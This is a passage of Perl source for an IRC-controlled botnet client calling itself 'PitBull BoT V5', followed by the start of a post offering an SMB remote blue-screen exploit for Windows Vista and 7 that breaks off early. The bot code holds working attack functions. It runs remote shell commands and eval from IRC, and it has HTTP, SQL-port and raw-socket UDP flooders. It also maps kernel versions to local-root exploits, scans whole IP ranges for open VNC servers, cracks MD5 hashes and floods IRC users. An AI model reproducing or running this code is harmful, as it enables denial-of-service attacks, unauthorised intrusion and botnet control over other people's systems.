(.*)<\/description>/g)
{
push(@ttt1,$1);
}
foreach $x (0..(@ttt - 1))
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ PacketStorm 12] ".$ttt[$x]." ".$ttt1[$x]."");
sleep 3;
$c++;
}
}
if ($funcarg =~ /^rootable/) {
my $khost = `uname -r`;
my $currentid = `whoami`;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] Currently you are ".$currentid." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] The kernel of this box is ".$khost." ");
chomp($khost);
my %h;
$h{'w00t'} = {
vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20']
};
$h{'brk'} = {
vuln=>['2.4.22','2.4.21','2.4.10','2.4.20']
};
$h{'ave'} = {
vuln=>['2.4.19','2.4.20']
};
$h{'elflbl'} = {
vuln=>['2.4.29']
};
$h{'elfdump'} = {
vuln=>['2.4.27']
};
$h{'expand_stack'} = {
vuln=>['2.4.29']
};
$h{'h00lyshit'} = {
vuln=>['2.6.8','2.6.10','2.6.11','2.6.9','2.6.7','2.6.13','2.6.14','2.6.15','2.6.16','2.6.2']
};
$h{'kdump'} = {
vuln=>['2.6.13']
};
$h{'km2'} = {
vuln=>['2.4.18','2.4.22']
};
$h{'krad'} = {
vuln=>['2.6.11']
};
$h{'krad3'} = {
vuln=>['2.6.11','2.6.9']
};
$h{'local26'} = {
vuln=>['2.6.13']
};
$h{'loko'} = {
vuln=>['2.4.22','2.4.23','2.4.24']
};
$h{'mremap_pte'} = {
vuln=>['2.4.20','2.2.25','2.4.24']
};
$h{'newlocal'} = {
vuln=>['2.4.17','2.4.19','2.4.18']
};
$h{'ong_bak'} = {
vuln=>['2.4.','2.6.']
};
$h{'ptrace'} = {
vuln=>['2.2.','2.4.22']
};
$h{'ptrace_kmod'} = {
vuln=>['2.4.2']
};
$h{'ptrace24'} = {
vuln=>['2.4.9']
};
$h{'pwned'} = {
vuln=>['2.4.','2.6.']
};
$h{'py2'} = {
vuln=>['2.6.9','2.6.17','2.6.15','2.6.13']
};
$h{'raptor_prctl'} = {
vuln=>['2.6.13','2.6.17','2.6.16','2.6.13']
};
$h{'prctl3'} = {
vuln=>['2.6.13','2.6.17','2.6.9']
};
$h{'remap'} = {
vuln=>['2.4.']
};
$h{'rip'} = {
vuln=>['2.2.']
};
$h{'stackgrow2'} = {
vuln=>['2.4.29','2.6.10']
};
$h{'uselib24'} = {
vuln=>['2.4.29','2.6.10','2.4.22','2.4.25']
};
$h{'newsmp'} = {
vuln=>['2.6.']
};
$h{'smpracer'} = {
vuln=>['2.4.29']
};
$h{'loginx'} = {
vuln=>['2.4.22']
};
$h{'exp.sh'} = {
vuln=>['2.6.9','2.6.10','2.6.16','2.6.13']
};
$h{'prctl'} = {
vuln=>['2.6.']
};
$h{'kmdx'} = {
vuln=>['2.6.','2.4.']
};
$h{'raptor'} = {
vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
};
$h{'raptor2'} = {
vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
};
foreach my $key(keys %h){
foreach my $kernel ( @{ $h{$key}{'vuln'} } ){
if($khost=~/^$kernel/){
chop($kernel) if ($kernel=~/.$/);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] Possible Local Root Exploits: ". $key ." ");
}
}
}
}
#Pr0xy Scan
if ($funcarg =~ /^proxy\s+(.*)/) {
my @User_Agent = &Agent();
my $str = $1;
if ($str =~ m/^(a|anon|anonymous)$/i) { $str = "anonymous";}
elsif ($str =~ m/^(transparent|tp|t)$/i) { $str = "transparent";}
elsif ($str =~ m/^(h|high|e|elite)$/i) { $str = "high anonymity";}
my @type = "$str";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ProxySearcher 12] Search Type: $str");
my @ttt=();
my @ttt1=();
my @ttt2=();
my @ttt3=();
my $sockt = IO::Socket::INET->new(PeerAddr=>"publicproxyservers.com",PeerPort=>"80",Proto=>"tcp") or return;
print $sockt "GET http://www.publicproxyservers.com/page1.html HTTP/1.0\r\nHost: publicproxyservers.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @rara = <$sockt>;
$page="@rara";
close($sockt);
while ($page =~ m//g) { push(@ttt,$1); } while ($page =~ m/ | ([A-Z].*)<\/td>/g) { push(@ttt1,$1); } while ($page =~ m/ | (.*)<\/td>/g) { push(@ttt2,$1); } while ($page =~ m/ | (anonymous|transparent|high anonymity)<\/td>/g) { push(@ttt3,$1); } foreach $proxyyy (0..(@ttt - 1)) { if ($ttt3[$proxyyy] =~ /@type/) { ( my $a, my $ipaddr ) = split( />/, $ttt[$x]); my $prox="".$ipaddr.":".$ttt2[$proxyyy].""; my $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; $ua->agent($User_Agent[rand(scalar(@User_Agent))]); $ua->proxy('http', 'http://'.$prox); my $response = $ua->get("http://www.google.com/search?q=The_PitBull"); if ($response->is_success) { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ProxySearcher 12] 4 ".$ipaddr.":".$ttt2[$proxyyy]." 12- 4 $ttt1[$proxyyy] 12- 4 $ttt3[$proxyyy] 12- OK!"); } } } done; }
# A simple mailer, @sendmail if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Mailer 12] Sending Mail to : 2 $3"); $subject = $1; $sender = $2; $recipient = $3; @corpo = $4; $mailtype = "content-type: text/html"; $sendmail = '/usr/sbin/sendmail'; open (SENDMAIL, "| $sendmail -t"); print SENDMAIL "$mailtype\n"; print SENDMAIL "Subject: $subject\n"; print SENDMAIL "From: $sender\n"; print SENDMAIL "To: $recipient\n\n"; print SENDMAIL "@corpo\n\n"; close (SENDMAIL); sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Mailer 12] Mail Sended To : 2 $recipient"); }
#SQL Fl00dEr if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SQL-DDOS 12] Attacking 4 ".$1." 12 on port 3306 for 4 ".$2." 12 seconds ."); my $itime = time; my ($cur_time); $cur_time = time - $itime; while ($2>$cur_time){ $cur_time = time - $itime; my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306); print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; close($socket); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SQL-DDOS 12] Attacking done 4 ".$1."."); }
#r0xb0t 4.6 VNC ScaNNer by iNs if ($funcarg =~ /^vnc\s+(.*)/) { my $MAX_SOCKET_TIME = 2; my $MAX_CONNECT_TIME = 3; #&ftpcheckm($printl); my @hosts; my $MAX_PROCESSES=100; my $host=$1; #my $victim=$host; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: IP Range: 4 $host* "); $|=1;
foreach (0..255) { my $pre="$host.$_."; foreach (1..255) { push(@hosts,$pre.$_); } }
my @pids; my $npids=0;
for $victim (@hosts){ my $pid; $pid=fork(); if($pid>0){ $npids++; if($npids>=$MAX_PROCESSES){ for(1..($MAX_PROCESSES)){ $wait_ret=wait(); if($wait_ret>0){ $npids--; } } } next; } elsif(undef $pid) { # print "fork error\n" if ($DEBUG); exit(0); }else{ my($proto,$port); $0=""; # kill thread on timeout local $SIG{'ALRM'} = sub { exit(0); }; alarm $MAX_SOCKET_TIME; my $port=5900; print "Connecting to $victim:$port..."; #$| = 1; ($sock = IO::Socket::INET->new(PeerAddr => $victim, PeerPort => $port, Proto => 'tcp',)) ? print "\n" : die("\n");
#negotiate protocol $sock->read($protocol_version,12); print $sock $protocol_version; #print "Using protocol $protocol_version"; # get security types that we'll be ignoring $sock->read($security_types,1); $sock->read($hahaha,unpack('C',$security_types)); # choose no authentication print $sock "\x01"; # we should get "0000" back $sock->read($in,4); if(unpack('I',$in)) { die("\n") }; # client initialize print $sock "\x01"; # if the server starts sending data we are in $sock->read($in,4); (unpack('I',$in)) ? sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: 4 ".$victim." 12is Vulnerable using protocol 4 ".$protocol_version) #print("Vulnerable!\n") : die("\n") ;
exit;
} }
for(1..$npids){ my $wt=wait(); if($wt==-1){ # print "hey $!\n" if($DEBUG); redo; } } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: Finished Scan for 4 $host "); }
#-#-#-#-#-#-#-#-# # IRC # #-#-#-#-#-#-#-#-# # join a other channel, @join #channel if ($funcarg =~ /^join (.*)/) { sendraw($IRC_cur_socket, "JOIN ".$1); } # part a other channel, @part #channel if ($funcarg =~ /^part (.*)/) { sendraw($IRC_cur_socket, "PART ".$1); } # quit irc, @quit if ($funcarg =~ /^quit (.*)/) { sendraw($IRC_cur_socket, "QUIT ".$1); } # voice, @voice if ($funcarg =~ /^voice (.*)/) { sendraw($IRC_cur_socket, "MODE $printl +v ".$1); } # devoice, @devoice if ($funcarg =~ /^devoice (.*)/) { sendraw($IRC_cur_socket, "MODE $printl -v ".$1); } # halfop, @halfop if ($funcarg =~ /^halfop (.*)/) { sendraw($IRC_cur_socket, "MODE $printl +h ".$1); } # dehalfop, @dehalfop if ($funcarg =~ /^dehalfop (.*)/) { sendraw($IRC_cur_socket, "MODE $printl -h ".$1); } # op, @op if ($funcarg =~ /^op (.*)/) { sendraw($IRC_cur_socket, "MODE $printl +o ".$1); } # deop, @deop if ($funcarg =~ /^deop (.*)/) { sendraw($IRC_cur_socket, "MODE $printl -o ".$1); } # +Q, @owner if ($funcarg =~ /^owner (.*)/) { sendraw($IRC_cur_socket, "MODE $printl +q ".$1); } # -Q, @deowner if ($funcarg =~ /^deowner (.*)/) { sendraw($IRC_cur_socket, "MODE $printl -q ".$1); }
#-#-#-#-#-#-#-#-# # Flooders IRC # #-#-#-#-#-#-#-#-# # msg, @msgflood if ($funcarg =~ /^msgflood (.+?) (.*)/) { for($i=0; $i<=10; $i+=1){ sendraw($IRC_cur_socket, "PRIVMSG ".$1." ".$2); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MSGFlood 12] 14 Excecuted on ".$1." "); }
# dccflood, @dccflood if ($funcarg =~ /^dccflood (.*)/) { for($i=0; $i<=10; $i+=1){ sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001DCC CHAT chat 1121485131 1024\001\n"); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ DCCFlood 12] 14 Excecuted on ".$1." "); }
# ctcpflood, @ctcpflood if ($funcarg =~ /^ctcpflood (.*)/) { for($i=0; $i<=10; $i+=1){ sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n"); sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n"); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ CTCPFlood 12] 14 Excecuted on ".$1." "); }
# noticeflood, @noticeflood if ($funcarg =~ /^noticeflood (.*)/) { for($i=0; $i<=10; $i+=1){ sendraw($IRC_cur_socket, "NOTICE ".$1." :PitBull BoT V5\n"); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ NoticeFlood 12] 14 Excecuted on ".$1." "); }
# Channel Flood, @channelflood if ($funcarg =~ /^channelflood/) { for($i=0; $i<=25; $i+=1){ sendraw($IRC_cur_socket, "JOIN #".(int(rand(99999))) ); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ChannelFlood 12] 14 Excecuted "); }
# Maxi Flood, @maxiflood if ($funcarg =~ /^maxiflood(.*)/) { for($i=0; $i<=15; $i+=1){ sendraw($IRC_cur_socket, "NOTICE ".$1." :PitBull BoT V5 M4Xi-Fl00d\n"); sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n"); sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n"); sendraw($IRC_cur_socket, "PRIVMSG ".$1." :PitBull BoT V5 M4Xi-Fl00d\n"); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ M4Xi-Fl00d 12] 14 Excecuted on ".$1." "); }
#-#-#-#-#-#-#-#-# # DDOS # #-#-#-#-#-#-#-#-#
#HTTP Flooder if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ HTTP-DDOS 12] Attacking 4 ".$1." 12 on port 80 for 4 ".$2." 12 seconds ."); my $itime = time; my ($cur_time); $cur_time = time - $itime; while ($2>$cur_time){ $cur_time = time - $itime; my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; close($socket); } sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ HTTP-DDOS 12] Attacking done 4 ".$1."."); }
# UDP Flooder if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ UDP-DDOS 12] Attacking 4 ".$1." 12 with 4 ".$2." 12 Kb Packets for 4 ".$3." 12 seconds. "); my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); $dtime = 1 if $dtime == 0; my %bytes; $bytes{igmp} = $2 * $pacotes{igmp}; $bytes{icmp} = $2 * $pacotes{icmp}; $bytes{o} = $2 * $pacotes{o}; $bytes{udp} = $2 * $pacotes{udp}; $bytes{tcp} = $2 * $pacotes{tcp}; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ UDP-DDOS 12] 12Results 4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in 4 ".$dtime." 12seconds to 4 ".$1."."); } exit; } }
sub ircase { my ($kem, $printl, $case) = @_; if ($case =~ /^join (.*)/) { j("$1"); } if ($case =~ /^part (.*)/) { p("$1"); } if ($case =~ /^rejoin\s+(.*)/) { my $chan = $1; if ($chan =~ /^(\d+) (.*)/) { for (my $ca = 1; $ca <= $1; $ca++ ) { p("$2"); j("$2"); } } else { p("$chan"); j("$chan"); } }
if ($case =~ /^op/) { op("$printl", "$kem") if $case eq "op"; my $oarg = substr($case, 3); op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); }
if ($case =~ /^deop/) { deop("$printl", "$kem") if $case eq "deop"; my $oarg = substr($case, 5); deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); }
if ($case =~ /^msg\s+(\S+) (.*)/) { msg("$1", "$2"); }
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { for (my $cf = 1; $cf <= $1; $cf++) { msg("$2", "$3"); } }
if ($case =~ /^ctcp\s+(\S+) (.*)/) { ctcp("$1", "$2"); }
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { for (my $cf = 1; $cf <= $1; $cf++) { ctcp("$2", "$3"); } }
if ($case =~ /^nick (.*)/) { nick("$1"); }
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { conectar("$2", "$1", 6667); }
if ($case =~ /^raw (.*)/) { sendraw("$1"); }
if ($case =~ /^eval (.*)/) { eval "$1"; } }
sub shell { my $printl=$_[0]; my $comando=$_[1]; if ($comando =~ /cd (.*)/) { chdir("$1") || msg("$printl", "No such file or directory"); return; }
elsif ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit;
} else { my @resp=`$comando 2>&1 3>&1`; my $c=0; foreach my $linha (@resp) { $c++; chop $linha; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SH3LL 12] 14 $linha"); if ($c == "$max_lines") { $c=0; sleep $sleeping; } } exit; } } }
sub Agent(){ my @ret = ( "Microsoft Internet Explorer/4.0b1 (Windows 95)", "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)", "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)", "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)", "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)", "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)", "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Microsoft Pocket Internet Explorer/0.6", "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)", "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;", "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)", "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)", "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)", "Advanced Browser (http://www.avantbrowser.com)", "Avant Browser (http://www.avantbrowser.com)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)", "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)", "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)", "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511", "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox", "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1", "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1", "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1", "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1", "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2", "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b", "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0", "Mozilla/3.0 (OS/2; U)", "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)", "Mozilla/4.61 (Macintosh; I; PPC)", "Mozilla/4.61 [en] (OS/2; U)", "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)", "Mozilla/4.8 [en] (Windows NT 5.0; U)" ); return(@ret); }
sub udpflooder { my $iaddr = inet_aton($_[0]); my $msg = 'A' x $_[1]; my $ftime = $_[2]; my $cp = 0; my (%pacotes); $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; return(undef) if $cp == 4; my $itime = time; my ($cur_time); while ( 1 ) { for (my $port = 1; $port <= 65000; $port++) { $cur_time = time - $itime; last if $cur_time >= $ftime; send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++; send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++; send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++; send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++; for (my $pc = 3; $pc <= 255;$pc++) { next if $pc == 6; $cur_time = time - $itime; last if $cur_time >= $ftime; socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++; } } last if $cur_time >= $ftime; } return($cur_time, %pacotes); }
sub ctcp { return unless $#_ == 1; sendraw("PRIVMSG $_[0] :\001$_[1]\001"); }
sub msg { return unless $#_ == 1; sendraw("PRIVMSG $_[0] :$_[1]"); }
sub notice { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]"); }
sub op { return unless $#_ == 1; sendraw("MODE $_[0] +o $_[1]"); }
sub deop { return unless $#_ == 1; sendraw("MODE $_[0] -o $_[1]"); }
sub j { &join(@_); }
sub join { return unless $#_ == 0; sendraw("JOIN $_[0]"); } sub p { part(@_); }
sub part { sendraw("PART $_[0]"); }
sub nick { return unless $#_ == 0; sendraw("NICK $_[0]"); }
sub quit { sendraw("QUIT :$_[0]"); }
sub ice(){ my $md5hash = $_[1]; chomp $md5hash; my $query = "http://ice.breaker.free.fr/md5.php?hash=".$md5hash; my $checker = query($query); if ($checker =~ m/
- (.*?)
/g) { my $cracked="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-ice.breaker.free.fr 4@ 12 ] 4 ==> ".$cracked.""); } else { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-ice.breaker.free.fr 4@ 12 ] 1 Has not Found."); }}
sub gdata(){ my $md5hash = $_[1]; chomp $md5hash; my $query = "http://www.gdataonline.com/qkhash.php?mode=txt&hash=".$md5hash; my $checker = query($query); if ($checker =~ m/(.*?)<\/b><\/td>/g) { my $cracked="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-gdataonline.com 4@ 12 ] 4 ==> ".$cracked.""); } else { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-gdataonline.com 4@ 12 ] 1 Has not Found."); }}
sub redn(){ my $md5hash = $_[1]; chomp $md5hash; my $query = "http://md5.rednoize.com/?p&s=md5&q=".$md5hash; my $checker = query($query); if ($checker =~ m/<(.*)/g) { my $cracked="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-rednoize.com 4@ 12 ] 4 ==> ".$cracked); } else { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-rednoize.com 4@ 12 ] 1 Has not Found."); }}
sub xpz(){ my $md5hash = $_[1]; chomp $md5hash; my $query = "http://md5.xpzone.de/?string=".$md5hash."&mode=decrypt"; my $checker = query($query); if ($checker =~ m/(.*)<\/b>/g) { my $cracked="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-xpzone.de 4@ 12 ] 4 ==> ".$cracked); } else { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-xpzone.de 4@ 12 ] 1 Has not Found."); }}
sub ben(){ my $md5hash = $_[1]; chomp $md5hash; my $query = "http://md5.benramsey.com/md5.php?hash=".$md5hash; my $checker = query($query); if ($checker =~ m/<\!\[CDATA\[(.+?)\]\]><\/string>/g) { my $cracked="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-benramsey.com 4@ 12 ] 4 ==> ".$cracked); } else { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-benramsey.com 4@ 12 ] 1 Has not Found."); }}
sub alim(){ my $md5hash = $_[1]; chomp $md5hash; my $query = "http://alimamed.pp.ru/md5/?md5e=&md5d=".$md5hash; my $checker = query($query); if ($checker =~ m/(.+?)<\/b>/g) { my $cracked="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-alimamed.pp.ru 4@ 12 ] 4 ==> ".$cracked); } else { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-alimamed.pp.ru 4@ 12 ] 1 Has not Found."); }}
sub cry(){ my $md5hash = $_[1]; chomp $md5hash; my $query = "http://us.md5.crysm.net/find?md5=".$md5hash; my $checker = query($query); if ($checker =~ m/(.+?)<\/li>/g) { my $cracked="$1"; sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-crysm.net 4@ 12 ] 4 ==> ".$cracked); } else { sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-crysm.net 4@ 12 ] 1 Has not Found."); }}
sub query($) { my $url=$_[0]; $url=~s/http:\/\///; my $host=$url; my $query=$url; my $page=""; $host=~s/href=\"?http:\/\///; $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query=~s/$host//; if ($query eq "") { $query="/";}; eval { my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; my @r = <$sock>; $page="@r"; close($sock); }; return $page; }
sub fix_url($) { my $str=$_[0]; if ($str =~ m/^http:\/\/(.*)/i || $str =~ m/^https:\/\/(.*)/i) { $set="".$str.""; } else { $set="http://".$str.""; } return $set; }
sub http_query($){ my ($url) = @_; my $host=$url; my $query=$url; my $page=""; $host =~ s/href=\"?http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~s/$host//; if ($query eq "") {$query="/";}; eval { local $SIG{ALRM} = sub { die "1";}; alarm 10; my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; my @r = <$sock>; $page="@r"; alarm 0; close($sock); }; return $page; } } ==========================================================
*This exploit is a remote BSoD vulnerability for winvista and windows 7 machines, some have been patched, and some machines haven't been patched*
Today, I was talking to my friend gotroot and I asked him if it was possible to convert this python exploit (the python version of this exploit) and convert it to Perl, so I ended up doing that with some help from him, he told me about the "use strict;" function and about "my" but the rest of the code I knew already :)
Here is the exploit code:
==============================================================
#!/usr/bin/perl
use IO::Socket; use strict;
my $host = $ARGV[0]; if($host) { } else { print "#! Usage: Smb-Bsod.pl 127.0.0.1 !#\n\n\a"; exit; } my $port = '445';
